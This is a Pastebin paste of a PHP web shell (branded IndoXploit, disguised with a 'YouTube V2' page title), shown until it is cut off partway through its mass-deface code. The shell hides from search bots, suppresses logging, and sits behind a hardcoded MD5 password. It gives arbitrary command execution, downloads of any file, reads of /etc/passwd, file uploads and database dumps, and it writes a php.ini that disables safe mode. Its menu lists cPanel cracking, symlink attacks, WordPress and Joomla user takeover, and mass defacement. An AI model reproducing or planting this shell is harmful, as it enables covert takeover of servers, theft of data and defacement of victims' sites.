API tools faq
paste
cdw1p

idxv2

cdw1p
Dec 20th, 2017
350
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 221.16 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $paswot="e595bbf0da95c36523757f32b46c1497"; //default pass: yuza
  3. @session_start();
  4. @error_reporting(0);
  5. @error_log(0);
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11. @set_time_limit(0);
  12. @set_magic_quotes_runtime(0);
  13. if( @preg_match("/(Google|robot|bot|bing|yahoo|facebook|visionutils)/Ui",$_SERVER['HTTP_USER_AGENT'])) {
  14.     die('HTTP/1.1 404 Not Found');
  15.     exit;
  16. }
  17. function printLogin() {
  18. ?>
  19. <html>
  20. <head>
  21. <title>YouTube V2</title>
  22. <link href='https://s.ytimg.com/yts/img/favicon_144-vflWmzoXw.png' rel='icon' type='image/x-icon'/>
  23. <meta name='author' content='bct'>
  24. <meta name='ROBOTS' content='NOINDEX, NOFOLLOW, NOARCHIVE' />
  25. <meta name='GOOGLEBOT' content='NOINDEX, NOFOLLOW, NOARCHIVE' />
  26. <meta charset="UTF-8">
  27. <style type='text/css'>
  28. @import url(https://fonts.googleapis.com/css?family=Abel);
  29. html {background: #000000;color: #ffffff;font-family: 'Abel';font-size: 13px;width: 100%;}
  30. input[type=text],input[type=password],input[type=submit] {background: transparent;color: red;border: 1px solid green;margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
  31. </style>
  32. </head>
  33. <style> input { margin:0;background-color:#fff;border:1px solid #fff; }</style><center>
  34. <form method=post><br><input type=password name=masuk placeholder="*********************"></form>
  35. </center>
  36.     <?php
  37.     exit;
  38. }
  39. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  40.     if( empty( $paswot ) ||
  41.         ( isset( $_POST['masuk'] ) && ( md5($_POST['masuk']) == $paswot ) ) )
  42.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  43.     else
  44.         printLogin();
  45. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  46.     @ob_clean();
  47.     $file = $_GET['file'];
  48.     header('Content-Description: File Transfer');
  49.     header('Content-Type: application/octet-stream');
  50.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  51.     header('Expires: 0');
  52.     header('Cache-Control: must-revalidate');
  53.     header('Pragma: public');
  54.     header('Content-Length: ' . filesize($file));
  55.     readfile($file);
  56.     exit;
  57. }
  58. ?>
  59. <html>
  60. <head>
  61. <title>YouTube V2</title>
  62. <link href='https://s.ytimg.com/yts/img/favicon_144-vflWmzoXw.png' rel='icon' type='image/x-icon'/>
  63. <meta name='author' content='IndoXploit'>
  64. <meta name='ROBOTS' content='NOINDEX, NOFOLLOW, NOARCHIVE' />
  65. <meta name='GOOGLEBOT' content='NOINDEX, NOFOLLOW, NOARCHIVE' />
  66. <meta charset="UTF-8">
  67. <style type='text/css'>
  68. @import url(https://fonts.googleapis.com/css?family=Abel);
  69. #menu a{padding:4px 18px;letter-spacing:2px;border-radius:4px;border-bottom:2px solid #B5AFAF;border-top:2px solid #B5AFAF;border-right:2px solid lime;border-left:2px solid lime}
  70. #menu a:hover{background:#008000;border-bottom:2px solid #333;border-top:2px solid #333;-moz-border-radius:10px;-moz-box-shadow:0 0 15px #15db15;-webkit-box-shadow:0 0 15px #15db15}
  71. html {background: #000000;color: #ffffff;font-family: 'Abel';font-size: 13px;width: 100%;}
  72. body{background-image:url(http://s13.postimg.org/6prkesz1j/2015_10_09_061926_2105.jpg);background-attachment:fixed;-webkit-background-size:cover;-moz-background-size:cover}
  73. table, th, td {border-collapse:collapse;font-family: Tahoma, Geneva, sans-serif;background: transparent;font-family: 'Abel';font-size: 13px;}
  74. .table_home, .th_home, .td_home {border: 1px solid #B5AFAF;}
  75. .table_home a {text-decoration:none;}
  76. .table_home tr:hover {background-color: green;}
  77. th {padding: 10px;text-shadow: 0pt 0pt 0.9em lime, 0pt 0pt 0.9em lime; color: #00ff00;text-decoration: none;}
  78. a {color: #ffffff;text-decoration: none;}
  79. a:hover {color: gold;text-decoration: underline;    text-shadow: 0pt 0pt 0.9em lime, 0pt 0pt 0.9em lime; color: #00ff00;text-decoration: none;}
  80. b {color: gold;}
  81. input[type=text], input[type=password],input[type=submit] {background: transparent; color: #ffffff; border: 1px solid #ffffff; margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
  82. textarea {border: 1px solid #ffffff;width: 100%;height: 400px;  padding-left: 5px;margin: 10px auto;resize: none;background: transparent;color: #ffffff;font-family: 'Abel';font-size: 13px;}
  83. select {background: transparent; color: #ffffff; border: 1px solid #ffffff; margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
  84. .but {background: transparent; color: #ffffff; border: 1px solid #ffffff; margin: 5px auto;padding-left: 5px;font-family: 'Abel';font-size: 13px;}
  85. li a:hover{text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime; color: #00ff00;text-decoration: none;}
  86. li {display: inline;margin: 5px;padding: 5px;}
  87. hr.gayane {height: 6px;background: url(https://s10.postimg.org/6v9fq769l/hrstyle.png) repeat-x 0 0;border: 0;}
  88. hr.style-two { border: 0;height: 1px;background: #333;background-image: -webkit-linear-gradient(left, #ccc, #333, #ccc);background-image: -moz-linear-gradient(left, #ccc, #333, #ccc);background-image: -ms-linear-gradient(left, #ccc, #333, #ccc);background-image: -o-linear-gradient(left, #ccc, #333, #ccc);}
  89. #kotakan{margin:8px 2px 4px 2px;}
  90. #kotakan a{padding:4px 18px;margin:0;background:#001a00;text-decoration:none;letter-spacing:1px;}
  91. #kotakan a:hover{text-shadow: 0pt 0pt 0.99em lime, 0pt 0pt 0.99em lime; color: #00e600; text-decoration: none;}
  92. </style>
  93. </head>
  94. <font face="Abel">
  95. <?php
  96. if (file_exists("php.ini")){
  97. }else{
  98. $img = fopen('php.ini', 'w');
  99. $sec = "safe_mode = OFF
  100. disable_funtions = NONE";
  101. fwrite($img ,$sec);
  102. fclose($img);}
  103. function w($dir,$perm) {
  104.     if(!is_writable($dir)) {
  105.         return "<font color=red>".$perm."</font>";
  106.     } else {
  107.         return "<font color=lime>".$perm."</font>";
  108.     }
  109. }
  110.     function UrlLoop($url,$type){
  111.  
  112.         $urlArray = array();
  113.  
  114.         $ch = curl_init();
  115.         curl_setopt($ch, CURLOPT_URL, $url);
  116.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  117.         $result = curl_exec($ch);
  118.  
  119.         $regex='|<a.*?href="(.*?)"|';
  120.         preg_match_all($regex,$result,$parts);
  121.         $links=$parts[1];
  122.         foreach($links as $link){
  123.             array_push($urlArray, $link);
  124.         }
  125.         curl_close($ch);
  126.  
  127.         foreach($urlArray as $value){
  128.             $paswot="$url$value";
  129.             if(preg_match("#$type#is", $paswot)) {
  130.                 echo "$paswot\r\n";
  131.             }
  132.         }
  133.     }
  134. function exe($cmd) {    
  135. if(function_exists('system')) {        
  136.         @ob_start();       
  137.         @system($cmd);     
  138.         $buff = @ob_get_contents();        
  139.         @ob_end_clean();       
  140.         return $buff;  
  141.     } elseif(function_exists('exec')) {        
  142.         @exec($cmd,$results);      
  143.         $buff = "";        
  144.         foreach($results as $result) {         
  145.             $buff .= $result;      
  146.         } return $buff;    
  147.     } elseif(function_exists('passthru')) {        
  148.         @ob_start();       
  149.         @passthru($cmd);       
  150.         $buff = @ob_get_contents();        
  151.         @ob_end_clean();       
  152.         return $buff;  
  153.     } elseif(function_exists('shell_exec')) {      
  154.         $buff = @shell_exec($cmd);     
  155.         return $buff;  
  156.     }
  157. }
  158. function perms($file){
  159. $perms = fileperms($file);
  160. if (($perms & 0xC000) == 0xC000) {
  161. $info = 's';
  162. } elseif (($perms & 0xA000) == 0xA000) {
  163. $info = 'l';
  164. } elseif (($perms & 0x8000) == 0x8000) {
  165. $info = '-';
  166. } elseif (($perms & 0x6000) == 0x6000) {
  167. $info = 'b';
  168. } elseif (($perms & 0x4000) == 0x4000) {
  169. $info = 'd';
  170. } elseif (($perms & 0x2000) == 0x2000) {
  171. $info = 'c';
  172. } elseif (($perms & 0x1000) == 0x1000) {
  173. $info = 'p';
  174. } else {
  175. $info = 'u';
  176. }
  177. $info .= (($perms & 0x0100) ? 'r' : '-');
  178. $info .= (($perms & 0x0080) ? 'w' : '-');
  179. $info .= (($perms & 0x0040) ?
  180. (($perms & 0x0800) ? 's' : 'x' ) :
  181. (($perms & 0x0800) ? 'S' : '-'));
  182. $info .= (($perms & 0x0020) ? 'r' : '-');
  183. $info .= (($perms & 0x0010) ? 'w' : '-');
  184. $info .= (($perms & 0x0008) ?
  185. (($perms & 0x0400) ? 's' : 'x' ) :
  186. (($perms & 0x0400) ? 'S' : '-'));
  187. $info .= (($perms & 0x0004) ? 'r' : '-');
  188. $info .= (($perms & 0x0002) ? 'w' : '-');
  189. $info .= (($perms & 0x0001) ?
  190. (($perms & 0x0200) ? 't' : 'x' ) :
  191. (($perms & 0x0200) ? 'T' : '-'));
  192. return $info;
  193. }
  194. function hdd($s) {
  195. if($s >= 1073741824)
  196. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  197. elseif($s >= 1048576)
  198. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  199. elseif($s >= 1024)
  200. return sprintf('%1.2f',$s / 1024 ) .' KB';
  201. else
  202. return $s .' B';
  203. }
  204. function ambilKata($param, $kata1, $kata2){
  205.     if(strpos($param, $kata1) === FALSE) return FALSE;
  206.     if(strpos($param, $kata2) === FALSE) return FALSE;
  207.     $start = strpos($param, $kata1) + strlen($kata1);
  208.     $end = strpos($param, $kata2, $start);
  209.     $return = substr($param, $start, $end - $start);
  210.     return $return;
  211. }
  212. if(get_magic_quotes_gpc()) {
  213.     function idx_ss($array) {
  214.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  215.     }
  216.     $_POST = idx_ss($_POST);
  217. }
  218. if(isset($_GET['dir'])) {
  219.     $dir = $_GET['dir'];
  220.     chdir($_GET['dir']);
  221. } else {
  222.     $dir = getcwd();
  223. }
  224. function excute($cfe) {
  225.   $res = '';
  226.   if (!empty($cfe)) {
  227.     if(@function_exists('exec')) {
  228.       @exec($cfe,$res);
  229.       $res = join("\n",$res);
  230.     } elseif(@function_exists('shell_exec')) {
  231.       $res = @shell_exec($cfe);
  232.     } elseif(@function_exists('system')) {
  233.       @ob_start();
  234.       @system($cfe);
  235.       $res = @ob_get_contents();
  236.       @ob_end_clean();
  237.     } elseif(@function_exists('passthru')) {
  238.       @ob_start();
  239.       @passthru($cfe);
  240.       $res = @ob_get_contents();
  241.       @ob_end_clean();
  242.     } elseif(@is_resource($f = @popen($cfe,"r"))) {
  243.       $res = "";
  244.       while(!@feof($f)) { $res .= @fread($f,1024); }
  245.       @pclose($f);
  246.     } else { $res = "Ex() Disabled!"; }
  247.   }
  248.   return $res;
  249. }
  250.   function showstat($stat) {
  251.     if ($stat=="on") { return "<font color=lime>ON</font>"; }
  252.     else { return "<font color=red>OFF</font>"; }
  253.   }
  254.   function named_conf(){
  255.   if(@is_readable('/etc/named.conf')){ return "<font color=lime>READABLE</font>";
  256.   }else { return "<font color=red>NOT READABLE</font>"; }
  257.   }
  258.   function passwd(){
  259.   if(@is_readable('/etc/passwd')){ return "<font color=lime>READABLE</font>";
  260.   }else { return "<font color=red>NOT READABLE</font>"; }
  261.   }
  262.   function testoracle() {
  263.   if (@function_exists('ocilogon')) { return showstat("on"); }
  264.   else { return showstat("off"); }
  265.   }
  266.   function testpostgresql() {
  267.     if (@function_exists('pg_connect')) { return showstat("on"); }
  268.     else { return showstat("off"); }
  269.   }
  270.   function testmssql() {
  271.     if (@function_exists('mssql_connect')) { return showstat("on"); }
  272.     else { return showstat("off"); }
  273.   }
  274.   function openbase_dir() {
  275.     if ($openbase_dir=@ini_get('open_basedir')){ return "<font color=red>".$openbase_dir."</font>"; }
  276.     else { return "<font color=lime>NONE</font>"; }
  277.   }
  278.   function testfetch() {
  279.     if(excute('fetch --help')) { return showstat("on"); }
  280.     else { return showstat("off"); }
  281.   }
  282.   function testsh() {
  283.     if (excute('bash --help')) { return showstat("on"); }
  284.     else { return showstat("off"); }
  285.   }
  286. $pwd = str_replace('\\', '/', dirname(__FILE__)).'/';
  287. $dir = str_replace("\\","/",$dir);
  288. $scdir = explode("/", $dir);
  289. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  290. $ling ="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  291. $ds = @ini_get("disable_functions");
  292. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  293. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  294. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  295. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  296. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  297. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  298. if(!function_exists('posix_getegid')) {
  299.     $user = @get_current_user();
  300.     $uid = @getmyuid();
  301.     $gid = @getmygid();
  302.     $group = "?";
  303. } else {
  304.     $uid = @posix_getpwuid(posix_geteuid());
  305.     $gid = @posix_getgrgid(posix_getegid());
  306.     $user = $uid['name'];
  307.     $uid = $uid['uid'];
  308.     $group = $gid['name'];
  309.     $gid = $gid['gid'];
  310. }
  311. $d0mains = @file("/etc/named.conf");
  312.             $users=@file('/etc/passwd');
  313.         if($d0mains)
  314.         {
  315.             $count;  
  316.             foreach($d0mains as $d0main)
  317.             {
  318.                 if(@ereg("zone",$d0main))
  319.                 {
  320.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  321.                     flush();
  322.                     if(strlen(trim($domains[1][0])) > 2)
  323.                     {
  324.                         flush();
  325.                         $count++;
  326.                     }
  327.                 }
  328.             }
  329.         }
  330.  
  331. $sport=$_SERVER['SERVER_PORT'];
  332. echo "<table style='width:100%'><center><img src='http://s3.postimg.org/nnibccmg3/2015_10_09_061436_3512.png' width='350' oncontextmenu='return false'></center>
  333. ";
  334. echo "<tr><td>&#9824;&nbsp;System Info : <font color=lime>".php_uname()."</font></td></tr>";
  335. echo "<tr><td>&#9824;&nbsp;Software : <font color=lime>".@getenv("SERVER_SOFTWARE")."</font></td></tr>";
  336. echo "<tr><td>&#9824;&nbsp;User : <font color=lime>".$user."</font> (".$uid.") Group : <font color=lime>".$group."</font> (".$gid.") | &#186; Server IP : <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | &#186; My IP : <font color=lime>".$_SERVER['REMOTE_ADDR']."</font> | &#186; HDD : <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  337. echo "<tr><td>&#9824;&nbsp;Safe Mode : $sm  | &#186; Open_BaseDir : ".openbase_dir()." | &#186; /etc/named.conf : ".named_conf()." | &#186; /etc/passwd : ".passwd()." | &#186; Disable Functions : $show_ds</td></tr>";
  338. echo "<tr><td>&#9824;&nbsp;MySQL : $mysql | MSSQL : ".testmssql()." | PostgreSQL : ".testpostgresql()." | ORACLE : ".testoracle()." | PERL : $perl | PYTHON : $python | FETCH : ".testfetch()." | BASH : ".testsh()." | WGET : $wget | CURL : $curl </td></tr>";
  339. echo "<tr><td>&#9824;&nbsp;Lokasi : ";
  340. foreach($scdir as $c_dir => $cdir) {   
  341.     echo "<a href='?dir=";
  342.     for($i = 0; $i <= $c_dir; $i++) {
  343.         echo $scdir[$i];
  344.         if($i != $c_dir) {
  345.         echo "/";
  346.         }
  347.     }
  348.     echo "'>$cdir</a>/";
  349. }
  350. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  351. echo "</td></tr></table><hr class='gayane'>";
  352. echo "<center>";
  353. echo "<ul>";
  354. echo "<div id='menu'>";
  355. echo "<a href='?'>Home</a>";
  356. echo "&nbsp;<a href='?dir=$dir&do=upload'>File Upload</a>";
  357. echo "&nbsp;<a href='?dir=$dir&do=cmd'>Command</a>";
  358. echo "&nbsp;<a href='?dir=$dir&do=hash'>Password Hash</a>";
  359. echo "&nbsp;<a href='?dir=$dir&do=hashid'>Hash Identifier</a>";
  360. echo "&nbsp;<a href='?dir=$dir&do=config'>Config</a>";
  361. echo "&nbsp;<a href='?dir=$dir&do=symconfig'>Config V2</a>";
  362. echo "&nbsp;<a href='?dir=$dir&do=jumping'>Jumping Server</a>";
  363. echo "&nbsp;<a href='?dir=$dir&do=mass_deface'>Mass Deface</a>";
  364. echo "&nbsp;<a href='?dir=$dir&do=symlink'>Symlink</a><br><br>";
  365. echo "&nbsp;<a href='?dir=$dir&do=passwbypass'>Bypass Tools</a>";
  366. echo "&nbsp;<a href='?dir=$dir&do=smtp'>SMTP Hunter</a>";
  367. echo "&nbsp;<a href='?dir=$dir&do=cpanel'>CPanel Cracker</a>";
  368. echo "&nbsp;<a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a>";
  369. echo "&nbsp;<a href='?dir=$dir&do=cgi'>CGI Telnet</a>";
  370. echo "&nbsp;<a href='?dir=$dir&do=adminer'>Adminer</a>";
  371. echo "&nbsp;<a href='?dir=$dir&do=fake_root'>Fake Root</a>";
  372. echo "&nbsp;<a href='?dir=$dir&do=dbdump'>Database Dump</a><br><br>";
  373. echo "&nbsp;<a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a>";
  374. echo "&nbsp;<a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a>";
  375. echo "&nbsp;<a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a>";
  376. echo "&nbsp;<a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V2</a>";
  377. echo "&nbsp;<a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V2</a><br><br>";
  378. echo "&nbsp;<a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V2</a>";
  379. echo "&nbsp;<a href='?dir=$dir&do=zoneh'>Zone-H Poster</a>";
  380. echo "&nbsp;<a href='?dir=$dir&do=defacerid'>Defacer.ID Poster</a>";
  381. echo "&nbsp;<a href='?dir=$dir&do=encode'>Encode & Decode</a>";
  382. echo "&nbsp;<a href='?dir=$dir&do=self'>Self Remove</a>";
  383. echo "&nbsp;<a href='?logout=true'>Logout</a><br>";
  384. echo "</div>";
  385. echo "</ul>";
  386. echo "</center>";
  387. echo "<hr class='gayane'>";
  388. if($_GET['logout'] == true) {
  389.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  390.     echo "<script>window.location='?';</script>";
  391. }elseif($_GET['do'] == 'upload') {
  392.     echo "<center>";
  393.     if($_POST['upload']) {
  394.         if($_POST['tipe_upload'] == 'biasa') {
  395.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  396.                 $act = "<font color=lime>File Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  397.             } else {
  398.                 $act = "<font color=red>Failed to upload file!</font>";
  399.             }
  400.         } else {
  401.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  402.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  403.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  404.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  405.                     $act = "<font color=lime>File Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  406.                 } else {
  407.                     $act = "<font color=red>Failed to upload file!</font>";
  408.                 }
  409.             } else {
  410.                 $act = "<font color=red>Failed to upload file!</font>";
  411.             }
  412.         }
  413.     }
  414.     echo "<br />Pilih Salah Satu :
  415.    <form method='post' enctype='multipart/form-data'>
  416.    <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  417.    <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  418.    <input type='file' name='ix_file'>
  419.    <input type='submit' value='upload' name='upload'>
  420.    </form>";
  421.     echo $act;
  422.     echo "</center>";
  423. } elseif ($_GET['do'] == 'dbdump') {
  424.     echo $head . '<center><br><p align="center">';
  425.     echo '<form action method=post>
  426.            <table width=400 class=tabnet >
  427.            <tr>
  428.                <td>Server </td>
  429.                <td><input class="inputz" type=text name=server value="localhost" size=52></td></tr><tr>
  430.                <td>Username</td>
  431.                <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  432.                <td>Password</td>
  433.                <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  434.                <td>DB Name</td>
  435.                <td><input class="inputz" type=text name=dbname size=52></td></tr>
  436.                <tr>
  437.                <td>DB Type </td>
  438.                <td><form method=post action="' . $me . '">
  439.                <select class="inputz" name=method>
  440.                    <option  value="gzip">Gzip</option>
  441.                    <option value="sql">Sql</option>
  442.                    </select>
  443.                <input class="inputzbut" type=submit value="  Dump!  " ></td></tr>
  444.                </form></center></table><br>';
  445.         if ($_POST['username'] && $_POST['dbname'] && $_POST['method']) {
  446.             $date = date("Y-m-d");
  447.             $dbserver = $_POST['server'];
  448.             $dbuser = $_POST['username'];
  449.             $dbpass = $_POST['password'];
  450.             $dbname = $_POST['dbname'];
  451.             $file = "Dump-$dbname-$date";
  452.             $method = $_POST['method'];
  453.             if ($method == 'sql') {
  454.                 $file = "Dump-$dbname-$date.sql";
  455.                 $fp = fopen($file, "w");
  456.             } else {
  457.                 $file = "Dump-$dbname-$date.sql.gz";
  458.                 $fp = gzopen($file, "w");
  459.             }
  460.                 function write($data) {
  461.                     global $fp;
  462.                         if ($_POST['method'] == 'ssql') {
  463.                             fwrite($fp, $data);
  464.                         } else {
  465.                             gzwrite($fp, $data);
  466.                         }
  467.                     }
  468.         mysql_connect($dbserver, $dbuser, $dbpass);
  469.         mysql_select_db($dbname);
  470.         $tables = mysql_query("SHOW TABLES");
  471.             while ($i = mysql_fetch_array($tables)) {
  472.                     $i = $i['Tables_in_' . $dbname];
  473.                     $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
  474.                     write($create['Create Table'] . ";nn");
  475.                     $sql = mysql_query("SELECT * FROM " . $i);
  476.                        if (mysql_num_rows($sql)) {
  477.                             while ($row = mysql_fetch_row($sql)) {
  478.                                 foreach ($row as $j => $k) {
  479.                                     $row[$j] = "'" . mysql_escape_string($k) . "'";
  480.                                 }
  481.                             write("INSERT INTO $i VALUES(" . implode(",", $row) . ");n");
  482.                             }
  483.                         }
  484.                     }
  485.                 if ($method == 'ssql') {
  486.                     fclose($fp);
  487.                 } else {
  488.                     gzclose($fp);
  489.                 }
  490.     header("Content-Disposition: attachment; filename=" . $file);
  491.     header("Content-Type: application/download");
  492.     header("Content-Length: " . filesize($file));
  493.     flush();
  494.         $fp = fopen($file, "r");
  495.             while (!feof($fp)) {
  496.                 echo fread($fp, 65536);
  497.                 flush();
  498.             }
  499.         fclose($fp);
  500.     }
  501. }elseif($_GET['do'] == 'hash'){
  502.     $submit = $_POST['enter'];
  503.     if (isset($_POST['password'])) {
  504.         $pass = $_POST['password']; // password
  505.         $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  506.         $hash = md5($pass); // md5 hash #1
  507.         $md4 = hash("md4", $pass);
  508.         $hash_md5 = md5($salt . $pass); // md5 hash with salt #2
  509.         $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
  510.         $hash1 = sha1($pass); // sha1 hash #4
  511.         $sha256 = hash("sha256", $text);
  512.         $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
  513.         $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
  514.  
  515.     }
  516.     echo '<center><form action="" method="post"><table>';
  517.     echo '<tr><td>Enter the word you want to encrypt:</td>';
  518.     echo '<td><input class="inputz" type="text" name="password" size="40" />';
  519.     echo '&nbsp;<input class="inputzbut" type="submit" name="enter" value="Hash" />';
  520.     echo '</td></tr><br>';
  521.     echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value=' . $pass . ' ></td></tr>';
  522.     echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value=' . $hash . ' ></td></tr>';
  523.     echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value=' . $md4 . ' ></td></tr>';
  524.     echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value=' . $hash_md5 . ' ></td></tr>';
  525.     echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value=' . $hash_md5_double . ' ></td></tr>';
  526.     echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value=' . $hash1 . '  ></td></tr>';
  527.     echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value=' . $sha256 . ' ></td></tr>';
  528.     echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value=' . $hash1_sha1 . ' ></td></tr>';
  529.     echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value=' . $hash1_sha1_double . ' ></td></tr></table></form></center><br>';
  530. }
  531. elseif($_GET['do'] == "hashid"){
  532. if (isset($_POST['hash'])) {
  533.         $hash = $_POST['hash'];
  534.         if (strlen($hash) == 32) {
  535.             $hashresult = "MD5 Hash";
  536.         } elseif (strlen($hash) == 40) {
  537.             $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  538.         } elseif (strlen($hash) == 13) {
  539.             $hashresult = "DES(Unix) Hash";
  540.         } elseif (strlen($hash) == 16) {
  541.             $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  542.         } elseif (strlen($hash) == 41) {
  543.             $GetHashChar = substr($hash, 40);
  544.             if ($GetHashChar == "*") {
  545.                 $hashresult = "MySQL5 Hash";
  546.             }
  547.         } elseif (strlen($hash) == 64) {
  548.             $hashresult = "SHA-256 Hash";
  549.         } elseif (strlen($hash) == 96) {
  550.             $hashresult = "SHA-384 Hash";
  551.         } elseif (strlen($hash) == 128) {
  552.             $hashresult = "SHA-512 Hash";
  553.         } elseif (strlen($hash) == 34) {
  554.             if (strstr($hash, '$1$')) {
  555.                 $hashresult = "MD5(Unix) Hash";
  556.             }
  557.         } elseif (strlen($hash) == 37) {
  558.             if (strstr($hash, '$apr1$')) {
  559.                 $hashresult = "MD5(APR) Hash";
  560.             }
  561.         } elseif (strlen($hash) == 34) {
  562.             if (strstr($hash, '$H$')) {
  563.                 $hashresult = "MD5(phpBB3) Hash";
  564.             }
  565.         } elseif (strlen($hash) == 34) {
  566.             if (strstr($hash, '$P$')) {
  567.                 $hashresult = "MD5(Wordpress) Hash";
  568.             }
  569.         } elseif (strlen($hash) == 39) {
  570.             if (strstr($hash, '$5$')) {
  571.                 $hashresult = "SHA-256(Unix) Hash";
  572.             }
  573.         } elseif (strlen($hash) == 39) {
  574.             if (strstr($hash, '$6$')) {
  575.                 $hashresult = "SHA-512(Unix) Hash";
  576.             }
  577.         } elseif (strlen($hash) == 24) {
  578.             if (strstr($hash, '==')) {
  579.                 $hashresult = "MD5(Base-64) Hash";
  580.             }
  581.         } else {
  582.             $hashresult = "<font color='red'>Hash type not found</font>";
  583.         }
  584.     } else {
  585.         $hashresult = "No Hash Entered";
  586.     }
  587. echo '<center><br>
  588.        <form action="" method="POST">
  589.        <tr>
  590.        <table class="tabnet">
  591.        <tr class="optionstr"><td>Enter Hash</td><td>&nbsp;&nbsp;:&nbsp;&nbsp;</td>  <td><input type="text" name="hash" size="60" class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  592.        <tr class="optionstr"><td>Result</td><td>&nbsp;&nbsp;:&nbsp;&nbsp;</td><td><font color="lime">'. $hashresult .'</font></td></tr>
  593.    </table></tr></form><br>
  594.    </center>';
  595. }
  596. elseif($_GET['do'] == 'cmd') {
  597.     echo "<form method='post'>
  598.     <font style='text-decoration: none;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  599.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  600.     </form>";
  601.     if($_POST['do_cmd']) {
  602.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  603.     }
  604. } elseif($_GET['do'] == 'mass_deface') {
  605.     echo "<center><form action=\"\" method=\"post\">\n";
  606.     $dirr=$_POST['d_dir'];
  607.     $index = $_POST["script"];
  608.     $index = str_replace('"',"'",$index);
  609.     $index = stripslashes($index);
  610.     function edit_file($file,$index){
  611.         if (is_writable($file)) {
  612.         clear_fill($file,$index);
  613.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  614.         }
  615.         else {
  616.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  617.             }
  618.             }
  619.     function hapus_massal($dir,$namafile) {
  620.         if(is_writable($dir)) {
  621.             $dira = scandir($dir);
  622.             foreach($dira as $dirb) {
  623.                 $dirc = "$dir/$dirb";
  624.                 $lokasi = $dirc.'/'.$namafile;
  625.                 if($dirb === '.') {
  626.                     if(file_exists("$dir/$namafile")) {
  627.                         unlink("$dir/$namafile");
  628.                     }
